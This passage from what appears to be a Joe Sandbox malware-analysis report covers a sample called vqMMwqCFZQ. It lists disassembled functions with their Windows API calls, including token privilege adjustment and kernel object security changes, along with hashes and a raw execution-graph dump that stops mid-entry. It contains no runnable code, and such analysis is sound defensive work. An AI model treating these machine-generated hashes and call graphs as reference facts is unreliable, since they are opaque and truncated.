                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                          • String ID:
                                          • API String ID: 2883127279-0
                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                          Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringlstrcmp
                                          • String ID: !N~
                                          • API String ID: 623250636-529124213
                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                          Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                          Strings
                                          • Error launching installer, xrefs: 00405C48
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                          Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CloseHandlelstrlenwvsprintf
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3509786178-2769509956
                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                          Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                          Execution Graph

                                          Execution Coverage:4.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:5%
                                          Total number of Nodes:1586
                                          Total number of Limit Nodes:29
                                          execution_graph 13837 40f740 13867 4144da 13837->13867 13840 40f974 13842 40f775 CreateFileA 13843 40f7ea 13842->13843 13844 40f7ac SetFileAttributesA 13842->13844 13846 40f8b7 13843->13846 13901 40fac0 13843->13901 13844->13843 13845 40f7bf GetLastError 13844->13845 13896 412920 13845->13896 13847 40f8d3 GetLastError 13846->13847 13848 40f905 13846->13848 13851 412920 26 API calls 13847->13851 13852 40f909 SetFileTime 13848->13852 13853 40f96d CloseHandle 13848->13853 13856 40f8e7 13851->13856 13852->13853 13857 40f943 GetLastError 13852->13857 13853->13840 13855 40f814 13855->13846 13906 40f980 13855->13906 13858 412920 26 API calls 13857->13858 13861 40f956 13858->13861 13860 40f83d 13860->13846 13862 40f873 13860->13862 13921 406640 13860->13921 13861->13853 13865 412920 26 API calls 13862->13865 13864 40f863 13866 412920 26 API calls 13864->13866 13865->13846 13866->13862 13868 4144ef 13867->13868 13875 40f751 13867->13875 13868->13875 13925 413968 13868->13925 13874 414509 13874->13875 13940 413326 13874->13940 13875->13840 13877 40fb60 13875->13877 13989 40fdc0 13877->13989 13879 40fb6f 13880 40fc4e 13879->13880 13885 40fbb2 13879->13885 13881 40fc52 13880->13881 13882 40fc6e DosDateTimeToFileTime LocalFileTimeToFileTime 13880->13882 13998 407730 13881->13998 13884 40fc5e 13882->13884 13884->13842 13886 40fbb6 13885->13886 13888 40fbcc 13885->13888 13992 40fce0 13886->13992 13889 40fbfd 13888->13889 13890 40fbc7 13888->13890 13892 40fbf8 13889->13892 13895 40fc34 13889->13895 13890->13888 13891 40fce0 55 API calls 13890->13891 13891->13892 13892->13889 13893 40fce0 55 API calls 13892->13893 13894 40fc29 13893->13894 13894->13842 13895->13842 14270 4149cb 13896->14270 13899 40f7d3 13899->13843 13902 40fad2 13901->13902 13904 40fad6 13901->13904 13902->13855 13903 40fb55 13903->13855 13904->13903 14294 40f6b0 13904->14294 13907 40f99a 13906->13907 13908 40f9af 13907->13908 14297 412310 13907->14297 13908->13860 13910 40f9f5 13911 40fa03 13910->13911 13912 413274 12 API calls 13910->13912 13911->13860 13914 40fa16 13912->13914 13913 40fa1f 13913->13860 13914->13913 13920 40fa84 13914->13920 14317 4126e0 13914->14317 13915 413326 ___free_lc_time 7 API calls 13917 40faa1 13915->13917 13917->13860 13918 40fa5a 13919 412920 26 API calls 13918->13919 13918->13920 13919->13920 13920->13915 13922 406652 13921->13922 13923 406687 CharToOemA 13921->13923 13922->13923 14363 413755 13922->14363 13923->13864 13926 413999 13925->13926 13927 41397e 13925->13927 13929 419d21 13926->13929 13927->13926 13951 415612 13927->13951 13930 414501 13929->13930 13931 419d2d 13929->13931 13933 419c6e 13930->13933 13931->13930 13932 413326 ___free_lc_time 7 API calls 13931->13932 13932->13930 13934 419cef 13933->13934 13936 419c82 13933->13936 13934->13874 13935 419ce7 13966 414423 13935->13966 13936->13934 13936->13935 13938 419cd1 CloseHandle 13936->13938 13938->13935 13939 419cdd GetLastError 13938->13939 13939->13935 13941 413332 13940->13941 13949 41334e 13940->13949 13942 41333c ___free_lc_time 13941->13942 13946 413352 ___free_lc_time 13941->13946 13944 41337e HeapFree 13942->13944 13945 413348 13942->13945 13943 41337d 13943->13944 13944->13949 13970 417705 13945->13970 13946->13943 13948 41336c 13946->13948 13976 41848c 13948->13976 13949->13875 13953 41562d 13951->13953 13960 41565c 13951->13960 13952 415670 13955 415742 WriteFile 13952->13955 13957 415681 13952->13957 13953->13952 13953->13960 13961 41908b 13953->13961 13956 415764 GetLastError 13955->13956 13955->13960 13956->13960 13958 4156cd WriteFile 13957->13958 13957->13960 13958->13957 13959 415737 GetLastError 13958->13959 13959->13960 13960->13926 13962 41909a 13961->13962 13965 4190c3 13961->13965 13963 4190cf SetFilePointer 13962->13963 13962->13965 13964 4190e7 GetLastError 13963->13964 13963->13965 13964->13965 13965->13952 13967 41447c 13966->13967 13968 414431 13966->13968 13967->13934 13968->13967 13969 414476 SetStdHandle 13968->13969 13969->13967 13971 417743 13970->13971 13975 4179f9 ___free_lc_time 13970->13975 13972 41793f VirtualFree 13971->13972 13971->13975 13973 4179a3 13972->13973 13974 4179b2 VirtualFree HeapFree 13973->13974 13973->13975 13974->13975 13975->13949 13977 4184b9 13976->13977 13979 4184cf 13976->13979 13977->13979 13980 418373 13977->13980 13979->13949 13983 418380 13980->13983 13981 418430 13981->13979 13982 4183a1 VirtualFree 13982->13983 13983->13981 13983->13982 13985 41831d VirtualFree 13983->13985 13986 41833a 13985->13986 13987 41836a 13986->13987 13988 41834a HeapFree 13986->13988 13987->13983 13988->13983 14005 4101d0 13989->14005 13991 40fdca 13991->13879 14113 413e3e 13992->14113 13994 40fd19 13995 40fd95 SystemTimeToFileTime LocalFileTimeToFileTime 13994->13995 13995->13890 13996 40fcf7 13996->13994 13997 40fd40 GetLocalTime 13996->13997 13997->13995 14249 413f9e GetLocalTime GetSystemTime 13998->14249 14001 413e3e 52 API calls 14002 407747 14001->14002 14255 413c4c 14002->14255 14006 4101eb 14005->14006 14007 410237 14006->14007 14008 410215 14006->14008 14018 41338f 14006->14018 14010 410259 GetFullPathNameA 14007->14010 14012 41027e 14007->14012 14008->13991 14011 410276 14010->14011 14010->14012 14011->13991 14013 4102b2 GetVolumeInformationA 14012->14013 14017 410329 14012->14017 14014 410305 14013->14014 14015 4102f8 14013->14015 14022 41c146 14014->14022 14015->13991 14017->13991 14019 4133ad 14018->14019 14021 4133a1 14018->14021 14032 4188a6 14019->14032 14021->14007 14023 41c17a 14022->14023 14024 41c159 14022->14024 14044 41918f 14023->14044 14024->14017 14027 413326 ___free_lc_time 7 API calls 14027->14024 14030 41918f 9 API calls 14031 41c1bf 14030->14031 14031->14027 14033 4188ef 14032->14033 14034 4188d7 GetStringTypeW 14032->14034 14036 41891a GetStringTypeA 14033->14036 14037 41893e 14033->14037 14034->14033 14035 4188f3 GetStringTypeA 14034->14035 14035->14033 14038 4189db 14035->14038 14036->14038 14037->14038 14040 418954 MultiByteToWideChar 14037->14040 14038->14021 14040->14038 14041 418978 14040->14041 14041->14038 14042 4189b2 MultiByteToWideChar 14041->14042 14042->14038 14043 4189cb GetStringTypeW 14042->14043 14043->14038 14045 4191db 14044->14045 14046 4191bf LCMapStringW 14044->14046 14049 419241 14045->14049 14050 419224 LCMapStringA 14045->14050 14046->14045 14047 4191e3 LCMapStringA 14046->14047 14047->14045 14048 41931d 14047->14048 14048->14031 14062 413274 14048->14062 14049->14048 14051 419257 MultiByteToWideChar 14049->14051 14050->14048 14051->14048 14052 419281 14051->14052 14052->14048 14053 4192b7 MultiByteToWideChar 14052->14053 14053->14048 14054 4192d0 LCMapStringW 14053->14054 14054->14048 14055 4192eb 14054->14055 14056 4192f1 14055->14056 14057 419331 14055->14057 14056->14048 14058 4192ff LCMapStringW 14056->14058 14057->14048 14059 419369 LCMapStringW 14057->14059 14058->14048 14059->14048 14060 419381 WideCharToMultiByte 14059->14060 14060->14048 14065 413286 14062->14065 14066 41328d 14065->14066 14067 413283 14065->14067 14066->14067 14069 4132b2 14066->14069 14067->14030 14067->14031 14070 4132c1 14069->14070 14072 4132d6 14069->14072 14074 4132cf 14070->14074 14080 417a2e 14070->14080 14073 413315 RtlAllocateHeap 14072->14073 14072->14074 14075 4132f6 14072->14075 14076 413324 14073->14076 14074->14073 14077 4132d4 14074->14077 14086 4184d1 14075->14086 14076->14066 14077->14066 14079 413301 14079->14073 14079->14076 14082 417a60 14080->14082 14081 417b0e 14081->14074 14082->14081 14085 417aff 14082->14085 14093 417d37 14082->14093 14085->14081 14100 417de8 14085->14100 14087 4184df 14086->14087 14088 4186a0 14087->14088 14091 4185cb VirtualAlloc 14087->14091 14092 41859c 14087->14092 14104 4181d9 14088->14104 14091->14092 14092->14079 14094 417d7a HeapAlloc 14093->14094 14095 417d4a HeapReAlloc 14093->14095 14097 417da0 VirtualAlloc 14094->14097 14099 417dca 14094->14099 14096 417d69 14095->14096 14095->14099 14096->14094 14098 417dba HeapFree 14097->14098 14097->14099 14098->14099 14099->14085 14101 417dfa VirtualAlloc 14100->14101 14103 417e43 14101->14103 14103->14081 14105 4181e6 14104->14105 14106 4181ed HeapAlloc 14104->14106 14107 41820a VirtualAlloc 14105->14107 14106->14107 14112 418242 14106->14112 14108 41822a VirtualAlloc 14107->14108 14109 4182ff 14107->14109 14110 4182f1 VirtualFree 14108->14110 14108->14112 14111 418307 HeapFree 14109->14111 14109->14112 14110->14109 14111->14112 14112->14092 14114 413e51 14113->14114 14116 413e4a 14113->14116 14117 4194a8 14114->14117 14116->13996 14118 4194b1 14117->14118 14119 4194b6 14117->14119 14121 4194bd 14118->14121 14119->14116 14140 4131f7 14121->14140 14124 4194f0 GetTimeZoneInformation 14128 419503 WideCharToMultiByte 14124->14128 14137 4195ce 14124->14137 14125 413326 ___free_lc_time 7 API calls 14127 419614 14125->14127 14126 4195e6 14126->14125 14126->14137 14132 413274 12 API calls 14127->14132 14130 419590 WideCharToMultiByte 14128->14130 14130->14137 14133 419621 14132->14133 14133->14137 14146 41aa8d 14133->14146 14136 41aa8d 6 API calls 14138 419692 14136->14138 14137->14119 14138->14137 14139 41aa8d 6 API calls 14138->14139 14139->14137 14141 413209 14140->14141 14142 413266 14140->14142 14141->14142 14144 41321a 14141->14144 14152 417437 14141->14152 14142->14124 14142->14126 14144->14142 14159 4173f8 14144->14159 14148 41aa95 14146->14148 14147 41338f 6 API calls 14147->14148 14148->14147 14149 41aac3 14148->14149 14150 41338f 6 API calls 14149->14150 14151 419664 14149->14151 14150->14149 14151->14136 14151->14137 14153 417498 14152->14153 14154 41744a 14152->14154 14153->14144 14154->14153 14155 417450 WideCharToMultiByte 14154->14155 14156 413274 12 API calls 14154->14156 14157 417471 WideCharToMultiByte 14154->14157 14164 41ad95 14154->14164 14155->14153 14155->14154 14156->14154 14157->14153 14157->14154 14160 417401 14159->14160 14161 417405 14159->14161 14160->14144 14233 41ab18 14161->14233 14165 41adf9 14164->14165 14166 41ada4 14164->14166 14165->14154 14166->14165 14167 41add9 14166->14167 14189 41af74 14166->14189 14169 41ae01 14167->14169 14171 41adf0 14167->14171 14183 41adf5 14167->14183 14169->14165 14173 413274 12 API calls 14169->14173 14174 417437 42 API calls 14171->14174 14176 41ae10 14173->14176 14174->14183 14175 41ae59 14178 413326 ___free_lc_time 7 API calls 14175->14178 14182 41ae87 14175->14182 14176->14165 14181 413274 12 API calls 14176->14181 14176->14183 14177 41ae97 14177->14165 14179 414564 24 API calls 14177->14179 14180 41ae68 14178->14180 14179->14182 14202 414564 14180->14202 14181->14183 14182->14165 14185 413274 12 API calls 14182->14185 14183->14165 14198 41af1c 14183->14198 14186 41aedf 14185->14186 14186->14165 14187 41aef0 SetEnvironmentVariableA 14186->14187 14188 413326 ___free_lc_time 7 API calls 14187->14188 14188->14165 14190 41af83 14189->14190 14191 41af7f 14189->14191 14192 413274 12 API calls 14190->14192 14191->14167 14193 41afa5 14192->14193 14194 41afb5 14193->14194 14223 414957 14193->14223 14196 41afd1 14194->14196 14229 41bd6e 14194->14229 14196->14167 14199 41af2a 14198->14199 14201 41ae4c 14198->14201 14200 4173f8 9 API calls 14199->14200 14199->14201 14200->14199 14201->14175 14201->14177 14203 414571 14202->14203 14204 41457f 14202->14204 14207 413274 12 API calls 14203->14207 14205 414594 14204->14205 14206 414586 14204->14206 14209 4146a4 14205->14209 14215 4145a2 ___free_lc_time 14205->14215 14208 413326 ___free_lc_time 7 API calls 14206->14208 14211 414579 14207->14211 14208->14211 14210 4147bf 14209->14210 14212 4146ad ___free_lc_time 14209->14212 14210->14211 14213 4147cd HeapReAlloc 14210->14213 14211->14182 14212->14211 14216 414785 HeapReAlloc 14212->14216 14218 414749 HeapAlloc 14212->14218 14221 4184d1 6 API calls 14212->14221 14222 41848c VirtualFree HeapFree VirtualFree ___free_lc_time 14212->14222 14213->14210 14213->14211 14214 414662 HeapReAlloc 14214->14215 14215->14211 14215->14214 14217 41461b HeapAlloc 14215->14217 14219 417a2e 5 API calls 14215->14219 14220 417705 VirtualFree VirtualFree HeapFree ___free_lc_time 14215->14220 14216->14212 14217->14215 14218->14212 14219->14215 14220->14215 14221->14212 14222->14212 14224 414960 14223->14224 14225 414965 14223->14225 14226 41a354 7 API calls 14224->14226 14227 41a38d 7 API calls 14225->14227 14226->14225 14228 41496e 14227->14228 14228->14194 14230 41bd77 14229->14230 14232 41bd84 14229->14232 14231 413274 12 API calls 14230->14231 14231->14232 14232->14194 14234 41ab4b CompareStringW 14233->14234 14237 41ab60 14233->14237 14235 41ab68 CompareStringA 14234->14235 14234->14237 14235->14237 14243 417424 14235->14243 14236 41abc1 CompareStringA 14236->14243 14237->14236 14238 41abdc 14237->14238 14239 41ac96 MultiByteToWideChar 14238->14239 14240 41ac1b GetCPInfo 14238->14240 14238->14243 14242 41acb2 14239->14242 14239->14243 14241 41ac30 14240->14241 14240->14243 14241->14239 14241->14243 14242->14243 14244 41acee MultiByteToWideChar 14242->14244 14243->14144 14244->14243 14245 41ad08 MultiByteToWideChar 14244->14245 14245->14243 14246 41ad20 14245->14246 14246->14243 14247 41ad54 MultiByteToWideChar 14246->14247 14247->14243 14248 41ad6b CompareStringW 14247->14248 14248->14243 14250 414003 GetTimeZoneInformation 14249->14250 14251 413fc8 14249->14251 14252 413ffc 14250->14252 14251->14250 14251->14252 14258 419a07 14252->14258 14254 407739 14254->14001 14262 413c5a 14255->14262 14257 407799 14257->13884 14259 419a20 14258->14259 14261 419a4b 14258->14261 14260 4194a8 52 API calls 14259->14260 14259->14261 14260->14261 14261->14254 14263 413e1a 14262->14263 14264 413c6e 14262->14264 14263->14257 14264->14263 14265 4194a8 52 API calls 14264->14265 14266 413de4 14265->14266 14267 413e3e 52 API calls 14266->14267 14268 413df5 14267->14268 14268->14263 14269 413e3e 52 API calls 14268->14269 14269->14263 14271 41294e 14270->14271 14273 4149f3 __aulldiv __aullrem 14270->14273 14271->13899 14279 413a3a 14271->14279 14272 415169 18 API calls 14272->14273 14273->14271 14273->14272 14274 413274 12 API calls 14273->14274 14275 413326 ___free_lc_time 7 API calls 14273->14275 14276 4151cf 18 API calls 14273->14276 14277 41519e 18 API calls 14273->14277 14278 41a4e0 WideCharToMultiByte 14273->14278 14274->14273 14275->14273 14276->14273 14277->14273 14278->14273 14281 413a50 14279->14281 14288 413ad4 14279->14288 14280 413aab 14282 413ab5 14280->14282 14283 413b19 14280->14283 14281->14280 14281->14288 14291 419125 14281->14291 14285 413acc 14282->14285 14289 413adc 14282->14289 14284 415612 6 API calls 14283->14284 14284->14288 14286 415612 6 API calls 14285->14286 14286->14288 14288->13899 14289->14288 14290 41908b 2 API calls 14289->14290 14290->14288 14292 413274 12 API calls 14291->14292 14293 419135 14292->14293 14293->14280 14295 40f6ba GetVersion 14294->14295 14296 40f6ce 14294->14296 14295->14296 14296->13904 14298 412334 14297->14298 14299 41232f 14297->14299 14300 412402 EnterCriticalSection 14298->14300 14302 41235b lstrlenA 14298->14302 14309 412338 14298->14309 14331 412550 14299->14331 14303 412436 LeaveCriticalSection GetVolumeInformationA 14300->14303 14304 41241e lstrcmpiA 14300->14304 14305 41236c 14302->14305 14316 412379 14302->14316 14307 4124b8 EnterCriticalSection 14303->14307 14308 41246f 14303->14308 14304->14303 14306 4124fc LeaveCriticalSection 14304->14306 14305->13910 14306->13910 14307->14306 14311 4124c7 lstrcpynA 14307->14311 14308->14307 14312 412484 GetDriveTypeA 14308->14312 14309->13910 14311->14306 14312->14307 14313 41249e 14312->14313 14340 4125f0 CreateFileA 14313->14340 14315 4124b5 14315->14307 14316->14300 14318 4126fe 14317->14318 14321 412703 14317->14321 14319 412550 18 API calls 14318->14319 14319->14321 14320 412721 IsValidSecurityDescriptor 14322 412730 14320->14322 14323 412738 GetSecurityDescriptorControl 14320->14323 14321->14320 14324 412707 14321->14324 14322->13918 14325 412751 14323->14325 14328 412759 14323->14328 14324->13918 14325->13918 14326 4127ce 14326->13918 14327 4127e4 CreateFileA 14329 412804 14327->14329 14330 41280e SetKernelObjectSecurity CloseHandle 14327->14330 14328->14326 14328->14327 14329->13918 14330->13918 14332 4125e1 14331->14332 14333 412560 CreateMutexA 14331->14333 14332->14298 14334 412572 14333->14334 14335 412576 InterlockedExchange 14333->14335 14334->14298 14336 4125b2 InitializeCriticalSection 14335->14336 14337 41258a InterlockedExchange CloseHandle WaitForSingleObject ReleaseMutex 14335->14337 14351 412830 GetCurrentProcess OpenProcessToken 14336->14351 14337->14298 14339 4125d0 ReleaseMutex 14339->14332 14341 4126b0 CreateFileA 14340->14341 14342 412629 GetKernelObjectSecurity GetLastError 14340->14342 14345 4126c7 CloseHandle 14341->14345 14346 4126d6 14341->14346 14343 412650 GetProcessHeap HeapAlloc 14342->14343 14344 4126a4 CloseHandle 14342->14344 14343->14344 14347 41266a GetKernelObjectSecurity 14343->14347 14344->14315 14345->14346 14346->14315 14348 412694 GetProcessHeap HeapFree 14347->14348 14349 41267e SetKernelObjectSecurity 14347->14349 14348->14344 14349->14348 14350 41268c 14349->14350 14350->14348 14352 412911 14351->14352 14353 41284f LookupPrivilegeValueA 14351->14353 14352->14339 14354 4128c0 14353->14354 14355 412886 AdjustTokenPrivileges 14353->14355 14357 412903 CloseHandle 14354->14357 14358 4128c9 LookupPrivilegeValueA 14354->14358 14355->14354 14356 41289e GetLastError 14355->14356 14356->14354 14359 4128a4 CloseHandle 14356->14359 14357->14352 14358->14357 14360 4128db AdjustTokenPrivileges 14358->14360 14359->14339 14360->14357 14361 4128f3 GetLastError 14360->14361 14361->14357 14362 4128f9 14361->14362 14362->14357 14364 4137c9 14363->14364 14365 41375f 14363->14365 14364->13922 14365->14364 14366 4137ad MultiByteToWideChar 14365->14366 14367 41377d 14365->14367 14366->13922 14368 4137a3 14367->14368 14369 41378d MultiByteToWideChar 14367->14369 14368->13922 14369->14368 14773 40a941 14836 4022e0 14773->14836 14776 40a96a 14786 40a9c8 14776->14786 14840 411170 14776->14840 14777 40a94f 14778 419c6e 3 API calls 14777->14778 14779 40a95b 14778->14779 14780 40aa13 14783 40aa4d 14780->14783 14965 40b0b0 14780->14965 14788 40aa8c 14783->14788 14789 40b0b0 30 API calls 14783->14789 14803 40aaf5 14783->14803 14784 40a995 14784->14786 14787 40a9a2 14784->14787 14785 40aa3f 14785->14788 14986 40c480 14785->14986 14786->14780 14786->14783 14790 406640 3 API calls 14786->14790 14792 419c6e 3 API calls 14787->14792 14791 419c6e 3 API calls 14788->14791 14794 40aa77 14789->14794 14795 40aa03 14790->14795 14796 40aa97 14791->14796 14797 40a9ae 14792->14797 14794->14788 15021 40b490 14794->15021 14798 412920 26 API calls 14795->14798 14800 40aab9 14796->14800 14802 412920 26 API calls 14796->14802 14798->14780 14801 40aa85 14801->14788 14801->14803 14802->14800 14804 40abc2 14803->14804 14805 40ab0b 14803->14805 14806 40abd3 14804->14806 14807 40ab6b 14804->14807 14808 419c6e 3 API calls 14805->14808 14810 40aca5 14806->14810 14811 40abde 14806->14811 14813 412920 26 API calls 14807->14813 14809 40ab17 14808->14809 14814 412920 26 API calls 14810->14814 14812 412920 26 API calls 14811->14812 14815 40abff 14812->14815 14817 40aba1 14813->14817 14816 40acc6 14814->14816 14819 419c6e 3 API calls 14815->14819 14818 40ae08 14817->14818 14820 40ad8c 14817->14820 15038 406ae0 14818->15038 14821 40ac26 14819->14821 14826 412920 26 API calls 14820->14826 14823 40ac9c 14821->14823 14825 40ac40 14821->14825 14824 40ae14 14827 419c6e 3 API calls 14824->14827 15028 410130 14825->15028 14830 40adcb 14826->14830 14828 40ae27 14827->14828 14833 419c6e 3 API calls 14830->14833 14831 40ac51 14831->14823 14832 40ac7b 14831->14832 14834 412920 26 API calls 14831->14834 14832->14823 14835 40adee 14833->14835 14834->14832 14837 4022e9 14836->14837 14839 4022ee 14836->14839 15049 402300 14837->15049 14839->14776 14839->14777 14841 4114a9 14840->14841 14842 41118a 14840->14842 14843 411512 14841->14843 14844 4114ae 14841->14844 15052 411100 14842->15052 14847 411640 14843->14847 14881 41151b 14843->14881 14845 413326 ___free_lc_time 7 API calls 14844->14845 14848 4114e2 14845->14848 14850 411892 14847->14850 14851 411649 14847->14851 14852 413326 ___free_lc_time 7 API calls 14848->14852 14849 4115ce 14856 411100 36 API calls 14849->14856 14866 4115e5 14849->14866 14853 411ad0 14850->14853 14861 41189c 14850->14861 14854 413274 12 API calls 14851->14854 14855 4114ee 14852->14855 14863 413326 ___free_lc_time 7 API calls 14853->14863 14869 4118a7 14853->14869 14858 41165e 14854->14858 14855->14784 14856->14866 14857 406640 CharToOemA MultiByteToWideChar MultiByteToWideChar 14857->14881 14860 